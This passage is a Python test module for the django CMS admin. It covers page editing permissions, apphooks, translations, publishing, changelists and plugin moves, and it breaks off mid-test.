from django.utils.six.moves.urllib.parse import urlparse
from cms.admin.change_list import CMSChangeList
from cms.admin.forms import PageForm, AdvancedSettingsForm
from cms.admin.pageadmin import PageAdmin
from cms.admin.permissionadmin import PagePermissionInlineAdmin
from cms import api
from cms.api import create_page, create_title, add_plugin, assign_user_to_page, publish_page
from cms.constants import PLUGIN_MOVE_ACTION
from cms.models import UserSettings, StaticPlaceholder
from cms.models.pagemodel import Page
from cms.models.permissionmodels import GlobalPagePermission, PagePermission
from cms.models.placeholdermodel import Placeholder
from cms.models.pluginmodel import CMSPlugin
from cms.models.titlemodels import Title
from cms.test_utils import testcases as base
from cms.test_utils.testcases import (
CMSTestCase, URL_CMS_PAGE_DELETE, URL_CMS_PAGE,URL_CMS_TRANSLATION_DELETE,
URL_CMS_PAGE_CHANGE_LANGUAGE, URL_CMS_PAGE_CHANGE, URL_CMS_PAGE_PERMISSIONS,
URL_CMS_PAGE_ADD, URL_CMS_PAGE_PUBLISHED
)
from cms.test_utils.util.fuzzy_int import FuzzyInt
from cms.utils import get_cms_setting
from cms.utils.i18n import force_language
from cms.utils.urlutils import admin_reverse
class AdminTestsBase(CMSTestCase):
@property
def admin_class(self):
return site._registry[Page]
def _get_guys(self, admin_only=False, use_global_permissions=True):
admin_user = self.get_superuser()
if admin_only:
return admin_user
USERNAME = 'test'
if get_user_model().USERNAME_FIELD == 'email':
normal_guy = get_user_model().objects.create_user(USERNAME, '[email protected]', '[email protected]')
else:
normal_guy = get_user_model().objects.create_user(USERNAME, '[email protected]', USERNAME)
normal_guy.is_staff = True
normal_guy.is_active = True
normal_guy.save()
normal_guy.user_permissions = Permission.objects.filter(
codename__in=['change_page', 'change_title', 'add_page', 'add_title', 'delete_page', 'delete_title']
)
if use_global_permissions:
gpp = GlobalPagePermission.objects.create(
user=normal_guy,
can_change=True,
can_delete=True,
can_change_advanced_settings=False,
can_publish=True,
can_change_permissions=False,
can_move_page=True,
)
gpp.sites = Site.objects.all()
return admin_user, normal_guy
class AdminTestCase(AdminTestsBase):
def test_extension_not_in_admin(self):
admin_user, staff = self._get_guys()
with self.login_user_context(admin_user):
request = self.get_request(URL_CMS_PAGE_CHANGE % 1, 'en',)
response = site.index(request)
self.assertNotContains(response, '/mytitleextension/')
self.assertNotContains(response, '/mypageextension/')
def test_permissioned_page_list(self):
"""
Makes sure that a user with restricted page permissions can view
the page list.
"""
admin_user, normal_guy = self._get_guys(use_global_permissions=False)
current_site = Site.objects.get(pk=1)
page = create_page("Test page", "nav_playground.html", "en",
site=current_site, created_by=admin_user)
PagePermission.objects.create(page=page, user=normal_guy)
with self.login_user_context(normal_guy):
resp = self.client.get(URL_CMS_PAGE)
self.assertEqual(resp.status_code, 200)
def test_edit_does_not_reset_page_adv_fields(self):
"""
Makes sure that if a non-superuser with no rights to edit advanced page
fields edits a page, those advanced fields are not touched.
"""
OLD_PAGE_NAME = 'Test Page'
NEW_PAGE_NAME = 'Test page 2'
REVERSE_ID = 'Test'
OVERRIDE_URL = 'my/override/url'
admin_user, normal_guy = self._get_guys()
current_site = Site.objects.get(pk=1)
# The admin creates the page
page = create_page(OLD_PAGE_NAME, "nav_playground.html", "en",
site=current_site, created_by=admin_user)
page.reverse_id = REVERSE_ID
page.save()
title = page.get_title_obj()
title.has_url_overwrite = True
title.path = OVERRIDE_URL
title.save()
self.assertEqual(page.get_title(), OLD_PAGE_NAME)
self.assertEqual(page.reverse_id, REVERSE_ID)
self.assertEqual(title.overwrite_url, OVERRIDE_URL)
# The user edits the page (change the page name for ex.)
page_data = {
'title': NEW_PAGE_NAME,
'slug': page.get_slug(),
'language': title.language,
'site': page.site.pk,
'template': page.template,
'pagepermission_set-TOTAL_FORMS': 0,
'pagepermission_set-INITIAL_FORMS': 0,
'pagepermission_set-MAX_NUM_FORMS': 0,
'pagepermission_set-2-TOTAL_FORMS': 0,
'pagepermission_set-2-INITIAL_FORMS': 0,
'pagepermission_set-2-MAX_NUM_FORMS': 0
}
        # required only if user has can_change_permission
with self.login_user_context(normal_guy):
resp = self.client.post(base.URL_CMS_PAGE_CHANGE % page.pk, page_data,
follow=True)
self.assertEqual(resp.status_code, 200)
self.assertTemplateNotUsed(resp, 'admin/login.html')
page = Page.objects.get(pk=page.pk)
self.assertEqual(page.get_title(), NEW_PAGE_NAME)
self.assertEqual(page.reverse_id, REVERSE_ID)
title = page.get_title_obj()
self.assertEqual(title.overwrite_url, OVERRIDE_URL)
# The admin edits the page (change the page name for ex.)
page_data = {
'title': OLD_PAGE_NAME,
'slug': page.get_slug(),
'language': title.language,
'site': page.site.pk,
'template': page.template,
'reverse_id': page.reverse_id,
            'pagepermission_set-TOTAL_FORMS': 0, # required only if user has can_change_permission
'pagepermission_set-INITIAL_FORMS': 0,
'pagepermission_set-MAX_NUM_FORMS': 0,
'pagepermission_set-2-TOTAL_FORMS': 0,
'pagepermission_set-2-INITIAL_FORMS': 0,
'pagepermission_set-2-MAX_NUM_FORMS': 0
}
with self.login_user_context(admin_user):
resp = self.client.post(base.URL_CMS_PAGE_CHANGE % page.pk, page_data,
follow=True)
self.assertEqual(resp.status_code, 200)
self.assertTemplateNotUsed(resp, 'admin/login.html')
page = Page.objects.get(pk=page.pk)
self.assertEqual(page.get_title(), OLD_PAGE_NAME)
self.assertEqual(page.reverse_id, REVERSE_ID)
title = page.get_title_obj()
self.assertEqual(title.overwrite_url, OVERRIDE_URL)
def test_edit_does_not_reset_apphook(self):
"""
Makes sure that if a non-superuser with no rights to edit advanced page
fields edits a page, those advanced fields are not touched.
"""
OLD_PAGE_NAME = 'Test Page'
NEW_PAGE_NAME = 'Test page 2'
REVERSE_ID = 'Test'
APPLICATION_URLS = 'project.sampleapp.urls'
admin_user, normal_guy = self._get_guys()
current_site = Site.objects.get(pk=1)
# The admin creates the page
page = create_page(OLD_PAGE_NAME, "nav_playground.html", "en",
site=current_site, created_by=admin_user)
page.reverse_id = REVERSE_ID
page.save()
title = page.get_title_obj()
title.has_url_overwrite = True
title.save()
page.application_urls = APPLICATION_URLS
page.save()
self.assertEqual(page.get_title(), OLD_PAGE_NAME)
self.assertEqual(page.reverse_id, REVERSE_ID)
self.assertEqual(page.application_urls, APPLICATION_URLS)
# The user edits the page (change the page name for ex.)
page_data = {
'title': NEW_PAGE_NAME,
'slug': page.get_slug(),
'language': title.language,
'site': page.site.pk,
'template': page.template,
'pagepermission_set-TOTAL_FORMS': 0,
'pagepermission_set-INITIAL_FORMS': 0,
'pagepermission_set-MAX_NUM_FORMS': 0,
'pagepermission_set-2-TOTAL_FORMS': 0,
'pagepermission_set-2-INITIAL_FORMS': 0,
'pagepermission_set-2-MAX_NUM_FORMS': 0,
}
with self.login_user_context(normal_guy):
resp = self.client.post(base.URL_CMS_PAGE_CHANGE % page.pk, page_data,
follow=True)
self.assertEqual(resp.status_code, 200)
self.assertTemplateNotUsed(resp, 'admin/login.html')
page = Page.objects.get(pk=page.pk)
self.assertEqual(page.get_title(), NEW_PAGE_NAME)
self.assertEqual(page.reverse_id, REVERSE_ID)
self.assertEqual(page.application_urls, APPLICATION_URLS)
title = page.get_title_obj()
# The admin edits the page (change the page name for ex.)
page_data = {
'title': OLD_PAGE_NAME,
'slug': page.get_slug(),
'language': title.language,
'site': page.site.pk,
'template': page.template,
'reverse_id': page.reverse_id,
}
with self.login_user_context(admin_user):
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page.pk, page_data,
follow=True)
self.assertEqual(resp.status_code, 200)
self.assertTemplateNotUsed(resp, 'admin/login.html')
resp = self.client.post(base.URL_CMS_PAGE_CHANGE % page.pk, page_data,
follow=True)
self.assertEqual(resp.status_code, 200)
self.assertTemplateNotUsed(resp, 'admin/login.html')
page = Page.objects.get(pk=page.pk)
self.assertEqual(page.get_title(), OLD_PAGE_NAME)
self.assertEqual(page.reverse_id, REVERSE_ID)
self.assertEqual(page.application_urls, '')
def test_2apphooks_with_same_namespace(self):
PAGE1 = 'Test Page'
PAGE2 = 'Test page 2'
APPLICATION_URLS = 'project.sampleapp.urls'
admin_user, normal_guy = self._get_guys()
current_site = Site.objects.get(pk=1)
# The admin creates the page
page = create_page(PAGE1, "nav_playground.html", "en",
site=current_site, created_by=admin_user)
page2 = create_page(PAGE2, "nav_playground.html", "en",
site=current_site, created_by=admin_user)
page.application_urls = APPLICATION_URLS
page.application_namespace = "space1"
page.save()
page2.application_urls = APPLICATION_URLS
page2.save()
# The admin edits the page (change the page name for ex.)
page_data = {
'title': PAGE2,
'slug': page2.get_slug(),
'language': 'en',
'site': page.site.pk,
'template': page2.template,
'application_urls': 'SampleApp',
'application_namespace': 'space1',
}
with self.login_user_context(admin_user):
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page.pk, page_data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(Page.objects.filter(application_namespace="space1").count(), 1)
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page2.pk, page_data)
self.assertEqual(resp.status_code, 200)
page_data['application_namespace'] = 'space2'
resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page2.pk, page_data)
self.assertEqual(resp.status_code, 302)
def test_delete(self):
admin_user = self.get_superuser()
create_page("home", "nav_playground.html", "en",
created_by=admin_user, published=True)
page = create_page("delete-page", "nav_playground.html", "en",
created_by=admin_user, published=True)
create_page('child-page', "nav_playground.html", "en",
created_by=admin_user, published=True, parent=page)
body = page.placeholders.get(slot='body')
add_plugin(body, 'TextPlugin', 'en', body='text')
page.publish('en')
with self.login_user_context(admin_user):
data = {'post': 'yes'}
response = self.client.post(URL_CMS_PAGE_DELETE % page.pk, data)
self.assertRedirects(response, URL_CMS_PAGE)
def test_delete_diff_language(self):
admin_user = self.get_superuser()
create_page("home", "nav_playground.html", "en",
created_by=admin_user, published=True)
page = create_page("delete-page", "nav_playground.html", "en",
created_by=admin_user, published=True)
create_page('child-page', "nav_playground.html", "de",
created_by=admin_user, published=True, parent=page)
body = page.placeholders.get(slot='body')
add_plugin(body, 'TextPlugin', 'en', body='text')
page.publish('en')
with self.login_user_context(admin_user):
data = {'post': 'yes'}
response = self.client.post(URL_CMS_PAGE_DELETE % page.pk, data)
self.assertRedirects(response, URL_CMS_PAGE)
def test_search_fields(self):
superuser = self.get_superuser()
from django.contrib.admin import site
with self.login_user_context(superuser):
for model, admin_instance in site._registry.items():
if model._meta.app_label != 'cms':
continue
if not admin_instance.search_fields:
continue
url = admin_reverse('cms_%s_changelist' % model._meta.model_name)
response = self.client.get('%s?q=1' % url)
errmsg = response.content
self.assertEqual(response.status_code, 200, errmsg)
def test_pagetree_filtered(self):
superuser = self.get_superuser()
create_page("root-page", "nav_playground.html", "en",
created_by=superuser, published=True)
with self.login_user_context(superuser):
url = admin_reverse('cms_page_changelist')
response = self.client.get('%s?template__exact=nav_playground.html' % url)
errmsg = response.content
self.assertEqual(response.status_code, 200, errmsg)
def test_delete_translation(self):
admin_user = self.get_superuser()
page = create_page("delete-page-translation", "nav_playground.html", "en",
created_by=admin_user, published=True)
create_title("de", "delete-page-translation-2", page, slug="delete-page-translation-2")
create_title("es-mx", "delete-page-translation-es", page, slug="delete-page-translation-es")
with self.login_user_context(admin_user):
response = self.client.get(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'de'})
self.assertEqual(response.status_code, 200)
response = self.client.post(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'de'})
self.assertRedirects(response, URL_CMS_PAGE)
response = self.client.get(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'es-mx'})
self.assertEqual(response.status_code, 200)
response = self.client.post(URL_CMS_TRANSLATION_DELETE % page.pk, {'language': 'es-mx'})
self.assertRedirects(response, URL_CMS_PAGE)
def test_change_dates(self):
admin_user, staff = self._get_guys()
with self.settings(USE_TZ=False, TIME_ZONE='UTC'):
page = create_page('test-page', 'nav_playground.html', 'en')
page.publish('en')
draft = page.get_draft_object()
original_date = draft.publication_date
original_end_date = draft.publication_end_date
new_date = timezone.now() - datetime.timedelta(days=1)
new_end_date = timezone.now() + datetime.timedelta(days=1)
url = admin_reverse('cms_page_dates', args=(draft.pk,))
with self.login_user_context(admin_user):
response = self.client.post(url, {
'language': 'en',
'site': draft.site.pk,
'publication_date_0': new_date.date(),
'publication_date_1': new_date.strftime("%H:%M:%S"),
'publication_end_date_0': new_end_date.date(),
'publication_end_date_1': new_end_date.strftime("%H:%M:%S"),
})
self.assertEqual(response.status_code, 302)
draft = Page.objects.get(pk=draft.pk)
self.assertNotEqual(draft.publication_date.timetuple(), original_date.timetuple())
self.assertEqual(draft.publication_date.timetuple(), new_date.timetuple())
self.assertEqual(draft.publication_end_date.timetuple(), new_end_date.timetuple())
if original_end_date:
self.assertNotEqual(draft.publication_end_date.timetuple(), original_end_date.timetuple())
with self.settings(USE_TZ=True, TIME_ZONE='UTC'):
page = create_page('test-page-2', 'nav_playground.html', 'en')
page.publish('en')
draft = page.get_draft_object()
original_date = draft.publication_date
original_end_date = draft.publication_end_date
new_date = timezone.localtime(timezone.now()) - datetime.timedelta(days=1)
new_end_date = timezone.localtime(timezone.now()) + datetime.timedelta(days=1)
url = admin_reverse('cms_page_dates', args=(draft.pk,))
with self.login_user_context(admin_user):
response = self.client.post(url, {
'language': 'en',
'site': draft.site.pk,
'publication_date_0': new_date.date(),
'publication_date_1': new_date.strftime("%H:%M:%S"),
'publication_end_date_0': new_end_date.date(),
'publication_end_date_1': new_end_date.strftime("%H:%M:%S"),
})
self.assertEqual(response.status_code, 302)
draft = Page.objects.get(pk=draft.pk)
self.assertNotEqual(draft.publication_date.timetuple(), original_date.timetuple())
self.assertEqual(timezone.localtime(draft.publication_date).timetuple(), new_date.timetuple())
self.assertEqual(timezone.localtime(draft.publication_end_date).timetuple(), new_end_date.timetuple())
if original_end_date:
self.assertNotEqual(draft.publication_end_date.timetuple(), original_end_date.timetuple())
def test_change_template(self):
admin_user, staff = self._get_guys()
request = self.get_request(URL_CMS_PAGE_CHANGE % 1, 'en')
request.method = "POST"
pageadmin = site._registry[Page]
with self.login_user_context(staff):
self.assertRaises(Http404, pageadmin.change_template, request, 1)
page = create_page('test-page', 'nav_playground.html', 'en')
response = pageadmin.change_template(request, page.pk)
self.assertEqual(response.status_code, 403)
url = admin_reverse('cms_page_change_template', args=(page.pk,))
with self.login_user_context(admin_user):
response = self.client.post(url, {'template': 'doesntexist'})
self.assertEqual(response.status_code, 400)
response = self.client.post(url, {'template': get_cms_setting('TEMPLATES')[0][0]})
self.assertEqual(response.status_code, 200)
def test_get_permissions(self):
page = create_page('test-page', 'nav_playground.html', 'en')
url = admin_reverse('cms_page_get_permissions', args=(page.pk,))
response = self.client.get(url)
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, '/en/admin/login/?next=%s' % (URL_CMS_PAGE_PERMISSIONS % page.pk))
admin_user = self.get_superuser()
with self.login_user_context(admin_user):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTemplateNotUsed(response, 'admin/login.html')
def test_changelist_items(self):
admin_user = self.get_superuser()
first_level_page = create_page('level1', 'nav_playground.html', 'en')
second_level_page_top = create_page('level21', "nav_playground.html", "en",
created_by=admin_user, published=True, parent=first_level_page)
second_level_page_bottom = create_page('level22', "nav_playground.html", "en",
created_by=admin_user, published=True,
parent=self.reload(first_level_page))
third_level_page = create_page('level3', "nav_playground.html", "en",
created_by=admin_user, published=True, parent=second_level_page_top)
self.assertEqual(Page.objects.all().count(), 4)
url = admin_reverse('cms_%s_changelist' % Page._meta.model_name)
request = self.get_request(url)
request.session = {}
request.user = admin_user
page_admin = site._registry[Page]
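        # ChangeList takes a long positional signature that varies across
        # Django versions, so the arguments are collected in a list and the
        # optional list_max_show_all slot is appended only when it exists.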
cl_params = [request, page_admin.model, page_admin.list_display,
page_admin.list_display_links, page_admin.list_filter,
page_admin.date_hierarchy, page_admin.search_fields,
page_admin.list_select_related, page_admin.list_per_page]
if hasattr(page_admin, 'list_max_show_all'): # django 1.4
cl_params.append(page_admin.list_max_show_all)
cl_params.extend([page_admin.list_editable, page_admin])
cl = CMSChangeList(*tuple(cl_params))
cl.set_items(request)
root_page = cl.get_items()[0]
self.assertEqual(root_page, first_level_page)
self.assertEqual(root_page.get_children()[0], second_level_page_top)
self.assertEqual(root_page.get_children()[1], second_level_page_bottom)
self.assertEqual(root_page.get_children()[0].get_children()[0], third_level_page)
def test_changelist_get_results(self):
admin_user = self.get_superuser()
first_level_page = create_page('level1', 'nav_playground.html', 'en', published=True)
second_level_page_top = create_page('level21', "nav_playground.html", "en",
created_by=admin_user, published=True,
parent=first_level_page)
second_level_page_bottom = create_page('level22', "nav_playground.html", "en", # nopyflakes
created_by=admin_user, published=True,
parent=self.reload(first_level_page))
third_level_page = create_page('level3', "nav_playground.html", "en", # nopyflakes
created_by=admin_user, published=True,
parent=second_level_page_top)
fourth_level_page = create_page('level23', "nav_playground.html", "en", # nopyflakes
created_by=admin_user,
parent=self.reload(first_level_page))
self.assertEqual(Page.objects.all().count(), 9)
url = admin_reverse('cms_%s_changelist' % Page._meta.model_name)
request = self.get_request(url)
request.session = {}
request.user = admin_user
page_admin = site._registry[Page]
# full blown page list. only draft pages are taken into account
cl_params = [request, page_admin.model, page_admin.list_display,
page_admin.list_display_links, page_admin.list_filter,
page_admin.date_hierarchy, page_admin.search_fields,
page_admin.list_select_related, page_admin.list_per_page]
if hasattr(page_admin, 'list_max_show_all'): # django 1.4
cl_params.append(page_admin.list_max_show_all)
cl_params.extend([page_admin.list_editable, page_admin])
cl = CMSChangeList(*tuple(cl_params))
cl.get_results(request)
self.assertEqual(cl.full_result_count, 5)
self.assertEqual(cl.result_count, 5)
# only one unpublished page is returned
request = self.get_request(url+'?q=level23')
request.session = {}
request.user = admin_user
cl_params[0] = request
cl = CMSChangeList(*tuple(cl_params))
cl.get_results(request)
self.assertEqual(cl.full_result_count, 5)
self.assertEqual(cl.result_count, 1)
# a number of pages matches the query
request = self.get_request(url+'?q=level2')
request.session = {}
request.user = admin_user
cl_params[0] = request
cl = CMSChangeList(*tuple(cl_params))
cl.get_results(request)
self.assertEqual(cl.full_result_count, 5)
self.assertEqual(cl.result_count, 3)
def test_unihandecode_doesnt_break_404_in_admin(self):
self.get_superuser()
if get_user_model().USERNAME_FIELD == 'email':
self.client.login(username='[email protected]', password='[email protected]')
else:
self.client.login(username='admin', password='admin')
response = self.client.get(URL_CMS_PAGE_CHANGE_LANGUAGE % (1, 'en'))
self.assertEqual(response.status_code, 404)
def test_empty_placeholder_in_correct_language(self):
"""
        Test that cleaning a placeholder only affects the current language's contents
"""
# create some objects
page_en = create_page("EmptyPlaceholderTestPage (EN)", "nav_playground.html", "en")
ph = page_en.placeholders.get(slot="body")
# add the text plugin to the en version of the page
add_plugin(ph, "TextPlugin", "en", body="Hello World EN 1")
add_plugin(ph, "TextPlugin", "en", body="Hello World EN 2")
# creating a de title of the page and adding plugins to it
create_title("de", page_en.get_title(), page_en, slug=page_en.get_slug())
add_plugin(ph, "TextPlugin", "de", body="Hello World DE")
add_plugin(ph, "TextPlugin", "de", body="Hello World DE 2")
add_plugin(ph, "TextPlugin", "de", body="Hello World DE 3")
# before cleaning the de placeholder
self.assertEqual(ph.get_plugins('en').count(), 2)
self.assertEqual(ph.get_plugins('de').count(), 3)
admin_user, staff = self._get_guys()
with self.login_user_context(admin_user):
url = '%s?language=de' % admin_reverse('cms_page_clear_placeholder', args=[ph.pk])
response = self.client.post(url, {'test': 0})
self.assertEqual(response.status_code, 302)
# After cleaning the de placeholder, en placeholder must still have all the plugins
self.assertEqual(ph.get_plugins('en').count(), 2)
self.assertEqual(ph.get_plugins('de').count(), 0)
class AdminTests(AdminTestsBase):
# TODO: needs tests for actual permissions, not only superuser/normaluser
def setUp(self):
self.page = create_page("testpage", "nav_playground.html", "en")
def get_admin(self):
User = get_user_model()
fields = dict(email="[email protected]", is_staff=True, is_superuser=True)
if (User.USERNAME_FIELD != 'email'):
fields[User.USERNAME_FIELD] = "admin"
usr = User(**fields)
usr.set_password(getattr(usr, User.USERNAME_FIELD))
usr.save()
return usr
def get_permless(self):
User = get_user_model()
fields = dict(email="[email protected]", is_staff=True)
if (User.USERNAME_FIELD != 'email'):
fields[User.USERNAME_FIELD] = "permless"
usr = User(**fields)
usr.set_password(getattr(usr, User.USERNAME_FIELD))
usr.save()
return usr
def get_page(self):
return self.page
def test_change_publish_unpublish(self):
page = self.get_page()
permless = self.get_permless()
with self.login_user_context(permless):
request = self.get_request()
response = self.admin_class.publish_page(request, page.pk, "en")
self.assertEqual(response.status_code, 405)
page = self.reload(page)
self.assertFalse(page.is_published('en'))
request = self.get_request(post_data={'no': 'data'})
response = self.admin_class.publish_page(request, page.pk, "en")
self.assertEqual(response.status_code, 403)
page = self.reload(page)
self.assertFalse(page.is_published('en'))
admin_user = self.get_admin()
with self.login_user_context(admin_user):
request = self.get_request(post_data={'no': 'data'})
response = self.admin_class.publish_page(request, page.pk, "en")
self.assertEqual(response.status_code, 302)
page = self.reload(page)
self.assertTrue(page.is_published('en'))
response = self.admin_class.unpublish(request, page.pk, "en")
self.assertEqual(response.status_code, 302)
page = self.reload(page)
self.assertFalse(page.is_published('en'))
def test_change_status_adds_log_entry(self):
page = self.get_page()
admin_user = self.get_admin()
with self.login_user_context(admin_user):
request = self.get_request(post_data={'no': 'data'})
self.assertFalse(LogEntry.objects.count())
response = self.admin_class.publish_page(request, page.pk, "en")
self.assertEqual(response.status_code, 302)
self.assertEqual(1, LogEntry.objects.count())
self.assertEqual(page.pk, int(LogEntry.objects.all()[0].object_id))
def test_change_innavigation(self):
page = self.get_page()
permless = self.get_permless()
admin_user = self.get_admin()
with self.login_user_context(permless):
request = self.get_request()
response = self.admin_class.change_innavigation(request, page.pk)
self.assertEqual(response.status_code, 405)
with self.login_user_context(permless):
request = self.get_request(post_data={'no': 'data'})
response = self.admin_class.change_innavigation(request, page.pk)
self.assertEqual(response.status_code, 403)
with self.login_user_context(permless):
request = self.get_request(post_data={'no': 'data'})
self.assertRaises(Http404, self.admin_class.change_innavigation,
request, page.pk + 100)
with self.login_user_context(permless):
request = self.get_request(post_data={'no': 'data'})
response = self.admin_class.change_innavigation(request, page.pk)
self.assertEqual(response.status_code, 403)
with self.login_user_context(admin_user):
request = self.get_request(post_data={'no': 'data'})
old = page.in_navigation
response = self.admin_class.change_innavigation(request, page.pk)
self.assertEqual(response.status_code, 200)
page = self.reload(page)
self.assertEqual(old, not page.in_navigation)
def test_publish_page_requires_perms(self):
permless = self.get_permless()
with self.login_user_context(permless):
request = self.get_request()
request.method = "POST"
response = self.admin_class.publish_page(request, Page.objects.all()[0].pk, "en")
self.assertEqual(response.status_code, 403)
def test_revert_page(self):
self.page.publish('en')
title = self.page.title_set.get(language='en')
title.title = 'new'
title.save()
self.assertEqual(Title.objects.all().count(), 2)
self.assertEqual(Page.objects.all().count(), 2)
with self.login_user_context(self.get_superuser()):
request = self.get_request()
request.method = "POST"
response = self.admin_class.revert_page(request, Page.objects.all()[0].pk, "en")
self.assertEqual(response.status_code, 302)
self.assertEqual(Title.objects.all().count(), 2)
self.assertEqual(Page.objects.all().count(), 2)
new_title = Title.objects.get(pk=title.pk)
self.assertNotEqual(title.title, new_title.title)
self.assertTrue(title.publisher_is_draft)
self.assertTrue(new_title.publisher_is_draft)
def test_revert_page_requires_perms(self):
permless = self.get_permless()
with self.login_user_context(permless):
request = self.get_request()
request.method = "POST"
response = self.admin_class.revert_page(request, Page.objects.all()[0].pk, 'en')
self.assertEqual(response.status_code, 403)
def test_revert_page_redirects(self):
admin_user = self.get_admin()
self.page.publish("en") # Ensure public copy exists before reverting
with self.login_user_context(admin_user):
response = self.client.post(admin_reverse('cms_page_revert_page', args=(self.page.pk, 'en')))
self.assertEqual(response.status_code, 302)
url = response['Location']
self.assertTrue(url.endswith('?%s' % get_cms_setting('CMS_TOOLBAR_URL__EDIT_OFF')))
def test_remove_plugin_requires_post(self):
ph = Placeholder.objects.create(slot='test')
plugin = add_plugin(ph, 'TextPlugin', 'en', body='test')
admin_user = self.get_admin()
with self.login_user_context(admin_user):
request = self.get_request()
response = self.admin_class.delete_plugin(request, plugin.pk)
self.assertEqual(response.status_code, 200)
def test_move_plugin(self):
ph = Placeholder.objects.create(slot='test')
plugin = add_plugin(ph, 'TextPlugin', 'en', body='test')
page = self.get_page()
source, target = list(page.placeholders.all())[:2]
pageplugin = add_plugin(source, 'TextPlugin', 'en', body='test')
plugin_class = pageplugin.get_plugin_class_instance()
with force_language('en'):
action_urls = pageplugin.get_action_urls()
expected = {
'reload': plugin_class.requires_reload(PLUGIN_MOVE_ACTION),
'urls': action_urls,
}
placeholder = Placeholder.objects.all()[0]
permless = self.get_permless()
admin_user = self.get_admin()
with self.login_user_context(permless):
request = self.get_request()
response = self.admin_class.move_plugin(request)
self.assertEqual(response.status_code, 405)
request = self.get_request(post_data={'not_usable': '1'})
self.assertRaises(RuntimeError, self.admin_class.move_plugin, request)
with self.login_user_context(admin_user):
request = self.get_request(post_data={'ids': plugin.pk})
self.assertRaises(RuntimeError, self.admin_class.move_plugin, request)
with self.login_user_context(admin_user):
request = self.get_request(post_data={'plugin_id': pageplugin.pk,
'placeholder_id': 'invalid-placeholder', 'plugin_language': 'en'})
self.assertRaises(RuntimeError, self.admin_class.move_plugin, request)
with self.login_user_context(permless):
request = self.get_request(post_data={'plugin_id': pageplugin.pk,
'placeholder_id': placeholder.pk, 'plugin_parent': '', 'plugin_language': 'en'})
self.assertEqual(self.admin_class.move_plugin(request).status_code, HttpResponseForbidden.status_code)
with self.login_user_context(admin_user):
request = self.get_request(post_data={'plugin_id': pageplugin.pk,
'placeholder_id': placeholder.pk, 'plugin_parent': '', 'plugin_language': 'en'})
response = self.admin_class.move_plugin(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content.decode('utf8')), expected)
with self.login_user_context(permless):
request = self.get_request(post_data={'plugin_id': pageplugin.pk,
'placeholder_id': placeholder.id, 'plugin_parent': '', 'plugin_language': 'en'})
self.assertEqual(self.admin_class.move_plugin(request).status_code, HttpResponseForbidden.status_code)
with self.login_user_context(admin_user):
request = self.get_request(post_data={'plugin_id': pageplugin.pk,
'placeholder_id': placeholder.id, 'plugin_parent': '', 'plugin_language': 'en'})
response = self.admin_class.move_plugin(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content.decode('utf8')), expected)
def test_move_language(self):
page = self.get_page()
source, target = list(page.placeholders.all())[:2]
col = add_plugin(source, 'MultiColumnPlugin', 'en')
sub_col = add_plugin(source, 'ColumnPlugin', 'en', target=col)
col2 = add_plugin(source, 'MultiColumnPlugin', 'de')
admin_user = self.get_admin()
with self.login_user_context(admin_user):
request = self.get_request(post_data={
'plugin_id': sub_col.pk,
'placeholder_id': source.id,
'plugin_parent': col2.pk,
'plugin_language': 'de'
})
response = self.admin_class.move_plugin(request)
self.assertEqual(response.status_code, 200)
sub_col = CMSPlugin.objects.get(pk=sub_col.pk)
self.assertEqual(sub_col.language, "de")
self.assertEqual(sub_col.parent_id, col2.pk)
def test_preview_page(self):
permless = self.get_permless()
with self.login_user_context(permless):
request = self.get_request()
self.assertRaises(Http404, self.admin_class.preview_page, request, 404, "en")
page = self.get_page()
page.publish("en")
base_url = page.get_absolute_url()
with self.login_user_context(permless):
request = self.get_request('/?public=true')
response = self.admin_class.preview_page(request, page.pk, 'en')
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], '%s?%s&language=en' % (base_url, get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')))
request = self.get_request()
response = self.admin_class.preview_page(request, page.pk, 'en')
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], '%s?%s&language=en' % (base_url, get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')))
current_site = Site.objects.create(domain='django-cms.org', name='django-cms')
page.site = current_site
page.save()
page.publish("en")
self.assertTrue(page.is_home)
response = self.admin_class.preview_page(request, page.pk, 'en')
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'],
'http://django-cms.org%s?%s&language=en' % (base_url, get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')))
def test_too_many_plugins_global(self):
conf = {
'body': {
'limits': {
'global': 1,
},
},
}
admin_user = self.get_admin()
url = admin_reverse('cms_page_add_plugin')
with self.settings(CMS_PERMISSION=False, CMS_PLACEHOLDER_CONF=conf):
page = create_page('somepage', 'nav_playground.html', 'en')
body = page.placeholders.get(slot='body')
add_plugin(body, 'TextPlugin', 'en', body='text')
with self.login_user_context(admin_user):
data = {
'plugin_type': 'TextPlugin',
'placeholder_id': body.pk,
'plugin_language': 'en',
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseBadRequest.status_code)
def test_too_many_plugins_type(self):
conf = {
'body': {
'limits': {
'TextPlugin': 1,
},
},
}
admin_user = self.get_admin()
url = admin_reverse('cms_page_add_plugin')
with self.settings(CMS_PERMISSION=False, CMS_PLACEHOLDER_CONF=conf):
page = create_page('somepage', 'nav_playground.html', 'en')
body = page.placeholders.get(slot='body')
add_plugin(body, 'TextPlugin', 'en', body='text')
with self.login_user_context(admin_user):
data = {
'plugin_type': 'TextPlugin',
'placeholder_id': body.pk,
'plugin_language': 'en',
'plugin_parent': '',
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, HttpResponseBadRequest.status_code)
def test_edit_title_dirty_bit(self):
language = "en"
admin_user = self.get_admin()
page = create_page('A', 'nav_playground.html', language)
page_admin = PageAdmin(Page, None)
page_admin._current_page = page
page.publish("en")
draft_page = page.get_draft_object()
admin_url = reverse("admin:cms_page_edit_title_fields", args=(
draft_page.pk, language
))
post_data = {
'title': "A Title"
}
